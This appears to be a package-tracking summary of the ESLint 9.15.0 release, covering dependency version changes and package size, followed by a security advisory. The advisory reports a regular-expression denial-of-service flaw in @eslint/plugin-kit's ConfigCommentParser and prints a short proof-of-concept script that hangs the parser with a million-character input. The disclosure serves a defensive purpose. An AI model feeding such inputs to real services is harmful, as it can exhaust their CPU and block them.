ESLint 9.15.0 represents an incremental update over version 9.14.0, refining this popular JavaScript linting tool. Developers leveraging ESLint to maintain code quality and consistency will find subtle but potentially impactful changes in this release.
In the realm of dependencies, several key shifts are noticeable. The @eslint/js dependency has been updated to 9.15.0, aligning with the core ESLint version and likely incorporating new or refined ECMAScript syntax support and rules. @eslint/core jumps from version 0.7.0 to 0.9.0, suggesting internal architectural improvements and rule processing enhancements, potentially affecting performance and extensibility. @eslint/eslintrc moves from 3.1.0 to 3.2.0, hinting at adjustments in configuration file handling and overrides. The @eslint/plugin-kit is updated from 0.2.0 to 0.2.3. Additionally, @eslint/config-array is updated from 0.18.0 to 0.19.0, and @eslint/json rises from 0.5.0 to 0.6.0. These probably introduce finer-grained control over rule configuration and extensibility options for plugin developers.
One important difference is the removal of text-table from the dependencies of the current version.
While most development dependencies remain consistent, indicating a focus on stability, the switch from cross-spawn:^7.0.2 to cross-spawn:^7.0.5 addresses potential cross-platform compatibility issues during development.
Overall, version 9.15.0 provides evolutionary refinements enhancing ESLint's core functionalities. Developers should review the changelog associated with the updated @eslint/* packages to fully understand the specific changes regarding rule behavior, configuration options, and potential performance gains. Package size slightly increased, with the unpacked size going from 3337162 to 3341911 bytes, and the number of files going from 420 in the previous version to 423 in the latest, so the update should be tested.
All the vulnerabilities related to version 9.15.0 of the package
@eslint/plugin-kit is vulnerable to Regular Expression Denial of Service attacks through ConfigCommentParser
The ConfigCommentParser#parseJSONLikeConfig API is vulnerable to a Regular Expression Denial of Service (ReDoS) attack in its only argument.
The regular expression at packages/plugin-kit/src/config-comment-parser.js:158 is vulnerable to a quadratic runtime attack because the grouped expression is not anchored. This can be solved by prepending the regular expression with [^-a-zA-Z0-9/].
const { ConfigCommentParser } = require("@eslint/plugin-kit");
// A long run of identifier characters followed by a character that breaks the match.
const str = `${"A".repeat(1000000)}?: 1 B: 2`;
console.log("start");
var parser = new ConfigCommentParser();
console.log(parser.parseJSONLikeConfig(str));
console.log("end");
// run `npm i @eslint/plugin-kit@0.3.3` and `node attack.js`
// then the program will be stuck forever with high CPU usage
This is a Regular Expression Denial of Service attack which may lead to blocking execution and high CPU usage.